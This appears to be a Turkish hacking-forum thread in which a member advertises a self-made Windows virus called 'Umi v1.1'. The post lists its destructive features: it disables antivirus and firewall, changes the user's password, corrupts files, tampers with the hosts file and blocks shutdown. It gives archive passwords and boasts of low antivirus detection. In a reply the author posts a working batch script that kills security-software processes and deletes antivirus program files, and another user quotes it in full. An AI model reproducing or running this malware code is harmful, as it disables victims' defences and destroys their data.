Turk Hack Team Umi Virüs v1.1

Ariss

Kıdemli Üye
8 Mar 2016
4,583
114
uzay
Turk Hack Team Umi v1.1 Slyfer

xTpBB0.jpg


xRDuEc.png

Selam dostlarım sizlere yapmış olduğum çalışmayı göstermek istedim. İlk defa böyle bir şey denedim daha doğrusu bundan önceki araştırmalarım daha basit ve şaka amaçlı idi. Umi v1.1 tamamen öğrenim amaçlı yapıldı. Virüsler hakkında bilgi edinmek ve araştırma yapan bu konu hakkında bilgi sahibi kişiler için uygundur. Tıklandığı zaman windowsun dosyalarına karışarak hemen gizlenir. Ardından firewall ve antivirüs programını kapatarak saldırıya başlar. Henüz ölümcül derece güçlü olduğu söylenemez ama etkili özellikleri mevcuttur. Wormlara karşı farklı bir ilgi beslediğim için içinde çeşitli worm ve clone virüsleri ekledim.


xRDuEc.png


---- Umi v1.1 Özellikleri ----​

- Anti Virüs devre dısı bırakıldı

- Firewall devre dısı bırakıldı

- Bilgisayardaki mevcut şifreyi değiştirir. Yeni şifre "*İKTİR GİT :)"

- Exe,jpg,klasör ve depolama aygıtındaki tüm linklere bulaşır

- Host dosyasını karıştırır

- Şifre içeren tüm .txt dosyalarına bulaşır

- İnternet hızını düşürür

- Sürekli kendini kopyalayan worm virüsü içerir

- Dosyaların yapısını ve uzantısını bozar

- Fare ayarlarını bozar varsa makro ayarlarını değiştirir

- Görev yöneticini etkisiz hale getirir

- Windows dosyaları içine yerleşir

- Sürekli olarak bilgisayarda klasör oluşturur,sonsuza kadar

- Reg açılamaz hale gelir

- Windows servislerini etkisiz hale getirir

- www.google.com,www.yandex.com ulaşılamaz hale getirir

- Açıldığı anda itibaren sistemde gizlenir

- Bilgisayarın kapanmasını önler, sadece power çıkması durumunda veya tuş ile bilgisayar kapatılabilir​

tJoGV2.gif



İndirme Linki :​


Yasal Uyarı : Oluşabilecek bütün sorunlar kullanıcıya aittir. Herhangi bir sorumluluk kabul etmiyorum. Yaptığınız eylemlerin hukuki sonuçlar doğurabileceğini unutmayın. Eğitim amaçlıdır lütfen daha farklı amaçlar için kullanmayınız


Rar Virüs Total Sonuçları :​



0/56

xT1rXs.png


xRDuEc.png


Exe Virus Total Sonuçları:

21/68



xT1LJY.png


Rar Pass
Kod:
tht

Exe pass
Kod:
tht




Arkadaşlar mesaj atan oluyor bu virüsü lütfen ana makinazda açmayın! Şaka aleti değil bu
 
Son düzenleme:

1titanik

Katılımcı Üye
29 Mar 2020
324
35
Cevap: Turk Hack Team Umi Virüs v1.1 Slyfer

Helal be kardeş . Böyle devam et. Yeni sürümün beklemesindeyiz .
 

erman147

Katılımcı Üye
3 Kas 2013
949
0
YALNIZLIK
Cevap: Turk Hack Team Umi Virüs v1.1 Slyfer

Ne illet ne yıvışık bir virüs :D peki bu işlemleri yaparken yönetici izni alamasa ne olur ?
 

Ariss

Kıdemli Üye
8 Mar 2016
4,583
114
uzay
Ne illet ne yıvışık bir virüs :D peki bu işlemleri yaparken yönetici izni alamasa ne olur ?

Windows izni almasaydı bazı özellikleri aktif olamayacaktı. Örnek vermek gerekirse host dosyasına erişemeyecek, görev yöntecisini durduramayacaktı veya bilgisayar kapandıktan sonra virüs deaktif hale gelecekti. Bu durumları çözmek için "sadece yönetici izni alarak" çalışır hale getirdim.

Bu baya kötüymüş ama. :) Ellerine sağlık.

Mesajım bulunsun

Teşekkür ederim
 

Ariss

Kıdemli Üye
8 Mar 2016
4,583
114
uzay
Antivirüsleri devre dışı mı bırakıyor?

Anti virüs yazılımlarına kill çekiyor, böylelikle etkisi kalkıyor.

Kullandığım kod tam olarak şu:

Kod:
@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.datcls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda
software\*.*
rem
 

Tdark

Katılımcı Üye
9 Ağu 2019
411
23
Anti virüs yazılımlarına kill çekiyor, böylelikle etkisi kalkıyor.

Kullandığım kod tam olarak şu:


Kod:
@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.datcls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda
software\*.*
 rem






windows defenderı da kapatıyor dimi bu kod
 

Rozz

Uzman üye
19 Ağu 2019
1,388
51
Eline sağlık, yarın zamanım olursa detaylı bir şekilde kodlarını inceleyeceğim, Acaba içindeki .exe dosyası hangi dil ile yazıldı öğrenebilirmiyim? :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.